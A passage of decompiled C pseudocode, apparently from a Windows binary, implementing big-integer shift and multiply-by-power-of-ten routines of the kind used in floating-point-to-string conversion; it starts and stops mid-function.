															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E00CBE920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E00CBE920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00CCAA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E00CBDDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E00CBDDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00CCAA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00CCAA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xcd6a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xcd6a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xcd6a06 + _t812 * 4) & 0x000000ff) + ( *(0xcd6a07 + _t812 * 4) & 0x000000ff);
												E00CBE920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00CBEA80( &(( &_v1396)[_t1097]), 0xcd6100 + ( *(0xcd6a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xcd6a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E00CCAA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00CCAA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00CCAA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0xcd6a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xcd6a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xcd6a06 + _t908 * 4) & 0x000000ff) + ( *(0xcd6a07 + _t908 * 4) & 0x000000ff);
												E00CBE920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00CBEA80( &(( &_v1396)[_t1104]), 0xcd6100 + ( *(0xcd6a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xcd6a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E00CCAA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00CCAA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00CCAA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00CCAA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
